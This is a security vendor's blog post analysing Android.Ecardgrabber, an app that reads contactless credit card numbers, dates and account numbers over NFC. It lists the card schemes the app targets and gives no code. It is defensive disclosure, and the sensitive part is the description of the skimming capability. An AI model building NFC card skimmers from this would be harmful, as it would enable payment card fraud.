Video Screencast Help
Security Response

Ecardgrabber: Android App Sniffing Contactless Credit Card Details over the Air

Created: 22 Jun 2012 21:27:23 GMT • Updated: 23 Jan 2014 18:14:34 GMT • Translations available: 日本語
Irfan Asrar's picture
+2 2 Votes
Login to vote

A security researcher from Germany released an Android application on Google Play that can obtain contactless credit card data over the air for a limited set of cards. Contactless credit cards can typically be used without a pin for transactions under €10 by simply holding the card near a point of sale terminal.

The Android application, which Symantec detects as Android.Ecardgrabber, attempts to read this data by using a communication protocol called Near Field Communication (NFC)— a technology present on the latest smartphones. The app was posted on Google Play on June 13 and was downloaded 100-500 times before removal.
 


 

 

What is Near Field Communication?

Near Field Communication enables contactless data exchange at short distances.
 


 

From the official Android Developer Site:

Near Field Communication (NFC) is a set of short-range wireless technologies, typically requiring a distance of 4cm or less to initiate a connection. NFC allows you to share small payloads of data between an NFC tag and an Android-powered device, or between two Android-powered devices.

 

Information retrieval

An analysis of the Android.Ecardgrabber code, has shown that the author had attempted to support information being retrieved from eight different credit card providers. One provider is shown below:
 


 

Based on the author's own admittance, the app was only successfully tested against two credit card systems and the code is in an incomplete state.

Attempts were made against:

  • MasterCard*
  • GeldKarte*
  • Visa V Pay**
  • Cirrus**
  • Maestro**
  • Visa Electron**
  • Visa**

*Verified successful by author
**Unverified but in the code

We were unable to get the application to retrieve the credit card details—however, we only had a Polish Payless MasterCard at our disposal so this to be expected.

The application is capable of retrieving the following information:

  • Credit card number
  • Valid from date
  • Expiration date
  • Bank account number

Note: Nowhere in the code did we see the credit card security code number extracted.

Although this application requires the user to install and place a contactless payment card within 4 centimeters of the phone to expose their details, it does highlight a potential weakness in this emerging technology. It not hard to imagine a malicious application running silently in the background of a mobile device mingling with your contactless credit card inside your wallet.

Near Field Communications is a new technology which will promises to make life simpler and more interactive, but users should be aware of the security concerns which can be overlooked.